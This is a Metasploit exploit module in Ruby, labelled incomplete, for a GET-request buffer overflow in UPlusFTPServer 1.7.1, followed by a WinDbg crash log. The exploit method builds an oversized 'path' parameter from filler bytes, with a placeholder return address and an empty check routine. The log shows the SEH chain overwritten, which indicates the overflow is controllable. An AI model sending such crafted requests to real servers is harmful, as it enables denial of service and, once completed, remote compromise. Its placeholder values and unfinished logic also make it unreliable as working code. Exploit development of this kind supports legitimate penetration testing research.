##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => "[INCOMPLETE] UPlusFTPServer v1.7.1 GET Request Buffer Overflow",
				'Description'    => %q{Module Description},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Karn Ganeshen',
					'corelanc0d3r',
					'sinn3r'
				],
			'References'     =>
				[
					['URL', 'http://www.exploit-db.com/exploits/14496/']
				],
			'Payload'        =>
				{
					'BadChars' => "\x00",
					'StackAdjustment' => -3500
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "seh",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['Universal', {'Ret'=>0x41414141}]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Apr 1 2011",
			'DefaultTarget'  => 0))	
	end

	def check
		#
		# Check three things:
		# 401 Unauthorized
		# Server: UplusFtp Server/1.0
		# WWW-Authenticate: BASIC realm="Login to UplusFtp Server"
		#

		#
		# Try to auth
		#
		
	end

	def exploit
		#
		# Set credential
		#
		user = datastore['BasicAuthUser'] || "anonymous"
		pass = datastore['BasicAuthPass'] || ""
		cred = "#{user}:#{pass}"

		print_status("#{rhost}:#{rport} - Using credential '#{cred}'")

		#
		# Craft malicious buffer.
		# If the max size is too big, the connection will reset,
		# and we get no crash.
		#
		buf = "A"*2308
		buf << "BBBB"
		buf << "CCCC"
		buf << "D"*(4000-buf.length) #4000 = max

		#
		# Send the malicious request
		#
		print_status("#{rhost}:#{rport} - Sending #{self.name}...")
		res = send_request_cgi({
			'method'     => 'GET',
			'uri'        => '/list.html',
			'basic_auth' => cred,
			'vars_get'   => { 'path' => buf }
		})

		print_line(res.to_s)
	end
end

=begin
The PoC on Exploit-DB doesn't seem reliable.
Also, the only component that's not protected by SafeSEH is ftpbasicsvr

0:001> g
(d3c.abc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=008a3d39 ebx=00000061 ecx=008a3b61 edx=00000001 esi=44444444 edi=00000000
eip=0040277e esp=009ce198 ebp=008a3b3c iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
ftpbasicsvr+0x277e:
0040277e 3a1e            cmp     bl,byte ptr [esi]          ds:0023:44444444=??
0:001> !exchain
009ced28: 43434343
Invalid exception stack at 42424242
0:001> lmf
start    end        module name
00400000 00445000   ftpbasicsvr C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
662b0000 66308000   hnetcfg  C:\WINDOWS\system32\hnetcfg.dll
71a50000 71a8f000   mswsock  C:\WINDOWS\system32\mswsock.dll
71a90000 71a98000   wshtcpip C:\WINDOWS\System32\wshtcpip.dll
71aa0000 71aa8000   WS2HELP  C:\WINDOWS\system32\WS2HELP.dll
71ab0000 71ac7000   WS2_32   C:\WINDOWS\system32\WS2_32.dll
76390000 763ad000   IMM32    C:\WINDOWS\system32\IMM32.DLL
77c10000 77c68000   msvcrt   C:\WINDOWS\system32\msvcrt.dll
77dd0000 77e6b000   ADVAPI32 C:\WINDOWS\system32\ADVAPI32.dll
77e70000 77f02000   RPCRT4   C:\WINDOWS\system32\RPCRT4.dll
77f10000 77f59000   GDI32    C:\WINDOWS\system32\GDI32.dll
77fe0000 77ff1000   Secur32  C:\WINDOWS\system32\Secur32.dll
7c800000 7c8f6000   kernel32 C:\WINDOWS\system32\kernel32.dll
7c900000 7c9af000   ntdll    C:\WINDOWS\system32\ntdll.dll
7e410000 7e4a1000   USER32   C:\WINDOWS\system32\USER32.dll
0:001> lmv m ftpbasicsvr
start    end        module name
00400000 00445000   ftpbasicsvr C (no symbols)           
    Loaded symbol image file: C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
    Image path: C:\Documents and Settings\lab\My Documents\Downloads\a787bd19b0c382b00331364d2670f084-uplusftp-server-1.7.1.01-en\uplusftp-server-1.7.1.01-en\ftpbasicsvr.exe
    Image name: ftpbasicsvr.exe
    Timestamp:        Sun Apr 11 23:02:48 2010 (4BC2B788)
    CheckSum:         00000000
    ImageSize:        00045000
    Translations:     0000.04b0 0000.04e4 0409.04b0 0409.04e4

=end